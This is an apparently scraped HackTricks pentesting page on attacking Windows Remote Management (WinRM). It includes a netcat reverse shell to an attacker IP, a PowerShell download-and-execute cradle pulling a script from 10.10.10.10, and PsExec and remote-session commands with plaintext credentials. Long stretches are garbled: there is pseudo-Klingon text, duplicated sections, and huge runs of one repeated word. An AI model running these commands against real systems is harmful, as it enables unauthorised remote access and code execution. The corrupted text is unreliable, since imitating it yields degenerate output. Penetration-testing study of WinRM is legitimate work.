36 KiB
5985,5986 - Pentesting WinRM
htARTE (HackTricks AWS Red Team Expert) !HackTricks!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!
Hacking Insights
Engage with content that delves into the thrill and challenges of hacking
Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights
Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates
Join us on Discord and start collaborating with top hackers today!
WinRM
Windows Remote Management (WinRM) is highlighted as a protocol by Microsoft that enables the remote management of Windows systems through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations.
The presence of WinRM on a machine allows for straightforward remote administration via PowerShell, akin to how SSH works for other operating systems. To determine if WinRM is operational, checking for the opening of specific ports is recommended:
- 5985/tcp (HTTP)
- 5986/tcp (HTTPS)
An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session.
Initiating a WinRM Session
To configure PowerShell for WinRM, Microsoft's Enable-PSRemoting cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted:
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
Qughmey:
Qaghmey trustedhosts qonwI'pu' vItlhutlh. 'ach vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh v
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
Test if configured
To verify the setup of your attack machine, the Test-WSMan command is utilized to check if the target has WinRM configured properly. By executing this command, you should expect to receive details concerning the protocol version and wsmid, indicating successful configuration. Below are examples demonstrating the expected output for a configured target versus an unconfigured one:
- For a target that is properly configured, the output will look similar to this:
{
"ProtocolVersion": "http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd",
"ProductVendor": "Microsoft Corporation",
"ProductVersion": "OS: 0.0.0 SP: 0.0 Stack: 3.0",
"ProductFamily": "Windows",
"Architecture": "x64",
"OSLanguage": "en-US",
"Locale": "en-US",
"BuildVersion": "10.0.17763.1",
"PSVersion": "5.1.17763.1007",
"SerializationVersion": "1.1.0.1",
"WSManStackVersion": "3.0",
"Wsmid": "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd",
"SupportedTransferProtocols": ["http", "https"],
"DefaultPorts": {"HTTP": 5985, "HTTPS": 5986},
"CapabilityURI": ["http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd"],
"SupportedLocale": ["en-US"],
"SupportedDataLocale": ["en-US"],
"SupportedEncoding": ["UTF-8", "UTF-16LE", "UTF-16BE", "UTF-32LE", "UTF-32BE", "ISO-8859-1", "US-ASCII"],
"SupportedCompression": ["GZIP", "NONE"],
"SupportedProfiles": ["http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"],
"SupportedOperations": ["Enumerate", "Get", "Pull", "Put", "Create", "Delete", "Invoke"],
"SupportedFormats": ["xml", "json"],
"SupportedSchemas": ["http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"]
}
- For a target that is not properly configured, the output will look similar to this:
Test-WSMan : <f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2150858770" Machine="target_machine_name"><f:Message><f:ProviderFault provider="Config provider" path="%systemroot%\system32\WsmSvc.dll"><f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2150858770" Machine="target_machine_name"><f:Message>WinRM cannot complete the operation. Verify that the specified computer name is valid, that the computer is accessible over the network, and that a firewall exception for the WinRM service is enabled and allows access from this computer. By default, the WinRM firewall exception for public profiles limits access to remote computers within the same local subnet. For more information, see the about_Remote_Troubleshooting Help topic.</f:Message></f:WSManFault></f:Message></f:WSManFault>
At line:1 char:1
+ Test-WSMan -ComputerName target_machine_name
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (target_machine_name:String) [Test-WSMan], InvalidOperationException
+ FullyQualifiedErrorId : WsManError,Microsoft.WSMan.Management.TestWSManCommand
Enable WinRM
To enable WinRM on a target machine, the Enable-PSRemoting command is used. This command configures the necessary settings to allow remote management via WinRM. After executing this command, you should receive a confirmation message indicating that WinRM has been successfully enabled.
Test-WSMan <target-ip>
Execute a command
To execute ipconfig remotely on a target machine and view its output, do the following:
Execute a command
To execute ipconfig remotely on a target machine and view its output, do the following:
Execute a command
To execute ipconfig remotely on a target machine and view its output, do the following:
Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]
tlhIngan Hol translation:
'ej Invoke-Command vetlh PS console command execute command current function enumeration local computer remote execute want Suppose you can do:
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
QapHa' Script
To execute a script on a Windows Remote Management (WinRM) service, you can use the Invoke-Command cmdlet in PowerShell. This cmdlet allows you to run commands or scripts on remote systems.
Here is an example of how to execute a script using Invoke-Command:
Invoke-Command -ComputerName <target> -ScriptBlock { <script> }
Replace <target> with the IP address or hostname of the target system, and <script> with the script you want to execute.
Make sure that WinRM is enabled on the target system and that you have the necessary permissions to execute scripts remotely. You may need to configure WinRM settings and set up appropriate firewall rules to allow the connection.
Remember to use this technique responsibly and only on systems that you have proper authorization to access.
Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]
Qapvam 'ej pongDaj
Description
A reverse shell is a technique used in hacking to gain remote access to a target system. It involves establishing a connection from the target system to the attacker's machine, allowing the attacker to execute commands on the target system.
Steps
- Identify a vulnerable service or application on the target system that can be exploited to gain remote access.
- Determine the IP address and port number of the attacker's machine.
- Use a payload or exploit to establish a reverse shell connection from the target system to the attacker's machine.
- Once the connection is established, the attacker can execute commands on the target system as if they were physically present.
- Take precautions to avoid detection, such as using encrypted connections or disguising the traffic.
Example
Here is an example of using the nc command to create a reverse shell connection:
attacker$ nc -lvp <port>
target$ nc <attacker_ip> <attacker_port> -e /bin/bash
In this example, the attacker listens for incoming connections on the specified port, while the target system connects back to the attacker's machine and opens a shell session.
Mitigation
To prevent reverse shell attacks, it is important to:
- Regularly update and patch software to fix vulnerabilities.
- Implement strong access controls and authentication mechanisms.
- Monitor network traffic for suspicious activity.
- Use intrusion detection and prevention systems.
- Employ network segmentation to limit the impact of a successful attack.
Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}
Get a PS session
To get an interactive PowerShell shell use Enter-PSSession:
Qapla' PS session
Qapla' interactive PowerShell shell vItlhutlh Enter-PSSession:
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)
Qa'chuq wsmprovhost lo'laHbe'chugh "victim"
WinRM Qapla'
PS Remoting je WinRM vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaHbe'chugh, vaj DaH jatlhlaH
.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
qarDaSmoH je 'ej qarDaSmoH
ghobe' vaj ghobe' qawHaq remote computers.
#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)
#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
